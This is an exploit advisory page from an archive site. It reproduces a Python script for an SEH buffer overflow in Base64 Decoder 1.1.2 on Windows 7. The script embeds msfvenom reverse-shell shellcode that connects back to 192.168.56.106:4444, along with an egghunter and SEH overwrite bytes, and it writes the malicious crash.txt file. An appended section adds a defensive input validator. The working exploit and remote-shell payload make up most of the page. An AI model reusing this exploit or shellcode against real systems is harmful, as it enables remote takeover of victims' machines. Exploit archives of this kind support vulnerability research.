Base64 Decoder 1.1.2 Buffer Overflow

2019.03.31
Credit: Paolo Perego
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

#!/usr/bin/env python3
# Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter
# Date: 28.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 7 Professional SP1 x86
# Notes: this exploit implements the PoC described here: https://www.exploit-db.com/exploits/39070
#
# Layout of the generated crash.txt (offsets follow from the padding below):
#   0..489   first stage: "w00tw00t" tag + reverse shell payload, padded with "A"
#   490..497 NOP sled
#   498..    egghunter, padded with "A" up to offset 620
#   620      nSEH (short jump back into the sled)
#   624      SEH handler (POP-POP-RET)

junk = b"A" * 4

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f py -b '\x00\x0a'
# "w00tw00t" is the tag the egghunter below searches memory for.
buf = b"w00tw00t"
buf += b"\xbd\x82\x38\x76\xea\xd9\xcd\xd9\x74\x24\xf4\x58\x2b"
buf += b"\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\xea\x36\x94"
buf += b"\x1f\x16\xae\xda\xe0\xe6\x2f\xbb\x69\x03\x1e\xfb\x0e"
buf += b"\x40\x31\xcb\x45\x04\xbe\xa0\x08\xbc\x35\xc4\x84\xb3"
buf += b"\xfe\x63\xf3\xfa\xff\xd8\xc7\x9d\x83\x22\x14\x7d\xbd"
buf += b"\xec\x69\x7c\xfa\x11\x83\x2c\x53\x5d\x36\xc0\xd0\x2b"
buf += b"\x8b\x6b\xaa\xba\x8b\x88\x7b\xbc\xba\x1f\xf7\xe7\x1c"
buf += b"\x9e\xd4\x93\x14\xb8\x39\x99\xef\x33\x89\x55\xee\x95"
buf += b"\xc3\x96\x5d\xd8\xeb\x64\x9f\x1d\xcb\x96\xea\x57\x2f"
buf += b"\x2a\xed\xac\x4d\xf0\x78\x36\xf5\x73\xda\x92\x07\x57"
buf += b"\xbd\x51\x0b\x1c\xc9\x3d\x08\xa3\x1e\x36\x34\x28\xa1"
buf += b"\x98\xbc\x6a\x86\x3c\xe4\x29\xa7\x65\x40\x9f\xd8\x75"
buf += b"\x2b\x40\x7d\xfe\xc6\x95\x0c\x5d\x8f\x5a\x3d\x5d\x4f"
buf += b"\xf5\x36\x2e\x7d\x5a\xed\xb8\xcd\x13\x2b\x3f\x31\x0e"
buf += b"\x8b\xaf\xcc\xb1\xec\xe6\x0a\xe5\xbc\x90\xbb\x86\x56"
buf += b"\x60\x43\x53\xf8\x30\xeb\x0c\xb9\xe0\x4b\xfd\x51\xea"
buf += b"\x43\x22\x41\x15\x8e\x4b\xe8\xec\x59\xb4\x45\xd6\xf3"
buf += b"\x5c\x94\x26\x15\xc1\x11\xc0\x7f\xe9\x77\x5b\xe8\x90"
buf += b"\xdd\x17\x89\x5d\xc8\x52\x89\xd6\xff\xa3\x44\x1f\x75"
buf += b"\xb7\x31\xef\xc0\xe5\x94\xf0\xfe\x81\x7b\x62\x65\x51"
buf += b"\xf5\x9f\x32\x06\x52\x51\x4b\xc2\x4e\xc8\xe5\xf0\x92"
buf += b"\x8c\xce\xb0\x48\x6d\xd0\x39\x1c\xc9\xf6\x29\xd8\xd2"
buf += b"\xb2\x1d\xb4\x84\x6c\xcb\x72\x7f\xdf\xa5\x2c\x2c\x89"
buf += b"\x21\xa8\x1e\x0a\x37\xb5\x4a\xfc\xd7\x04\x23\xb9\xe8"
buf += b"\xa9\xa3\x4d\x91\xd7\x53\xb1\x48\x5c\x63\xf8\xd0\xf5"
buf += b"\xec\xa5\x81\x47\x71\x56\x7c\x8b\x8c\xd5\x74\x74\x6b"
buf += b"\xc5\xfd\x71\x37\x41\xee\x0b\x28\x24\x10\xbf\x49\x6d"
junk += buf
print("filling with " + str(490 - len(junk)))
junk += b"A" * (490 - len(junk))
junk += b"\x90\x90\x90\x90"
junk += b"\x90\x90\x90\x90"

# msf-egghunter -f raw -e w00t -a x86 -p windows | msfvenom -a x86 --platform windows -f py -b '\x00' -v egg
egg = b""
egg += b"\xb8\x2e\x04\x6d\x70\xdb\xd5\xd9\x74\x24\xf4\x5a\x2b"
egg += b"\xc9\xb1\x09\x31\x42\x12\x83\xea\xfc\x03\x6c\x0a\x8f"
egg += b"\x85\x16\x93\x85\x99\xd9\xd1\x4b\x0c\xe7\x8d\xa6\xfe"
egg += b"\xdb\x28\x63\x8b\xcc\x8b\xe4\x43\x22\x98\x83\x73\xed"
egg += b"\x15\x7e\xd4\x84\x32\x81\xcc"
junk += egg
junk += b"A" * (620 - len(junk))
# nSEH at offset 620: short jump backwards into the NOP sled / egghunter
junk += b"\xeb\x80\x90\x90"
# POP-POP-RET is on 0x00401414 (SEH handler at offset 624, little-endian;
# the high null byte of the address is not written)
junk += b"\x14\x14\x40"
# Binary mode, so no newline translation alters the payload bytes;
# the original script also never called close() (missing parentheses).
with open("crash.txt", "wb") as f:
    f.write(junk)
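As an added, defensive example (not part of the advisory and not the vendor's code): a strict pre-check that a file must pass before it is handed to a decoder that trusts the input length. It is sized against the layout the script above relies on (627-byte file, SEH record at offset 620). MAX_INPUT_BYTES is an assumed bound, not a vendor value, and the two samples are constructed.

```python
import base64
import binascii

# Assumed safe bound for a legacy decoder's input (not taken from the vendor);
# the crash.txt produced by the script above is 627 bytes, with the SEH
# record overwritten at offset 620, so anything near that size is refused.
MAX_INPUT_BYTES = 512
B64_ALPHABET = frozenset(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def first_bad_offset(body):
    """Offset of the first byte outside the base64 alphabet, or -1 if none."""
    for i, c in enumerate(body):
        if c not in B64_ALPHABET:
            return i
    return -1


def check_base64_input(data):
    """Return (ok, reason) for raw file bytes destined for a base64 decoder.

    Line breaks and spaces are tolerated (joined away); everything else must
    be canonical base64, and the total size is capped before any parsing.
    """
    if len(data) > MAX_INPUT_BYTES:
        return False, "input too long: %d bytes" % len(data)
    body = b"".join(data.split())          # strip whitespace only
    bad = first_bad_offset(body)
    if bad != -1:
        return False, "non-base64 byte 0x%02x at offset %d" % (body[bad], bad)
    if len(body) % 4:
        return False, "length %d is not a multiple of 4" % len(body)
    try:
        base64.b64decode(body, validate=True)
    except binascii.Error as exc:
        return False, "decode error: %s" % exc
    return True, "ok"


# Constructed samples: one with the same shape as the page's payload (filler,
# nSEH, SEH) with the shellcode omitted, and a benign line-wrapped file.
SAMPLE_CRASH = b"A" * 620 + b"\x90" * 4 + b"\x14\x14\x40"
SAMPLE_GOOD = b"SGVsbG8s\nIHdvcmxk\nIQ==\n"

if __name__ == "__main__":
    for name, sample in (("crash", SAMPLE_CRASH), ("good", SAMPLE_GOOD)):
        print(name, check_base64_input(sample))
```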



Copyright 2019, cxsecurity.com

 
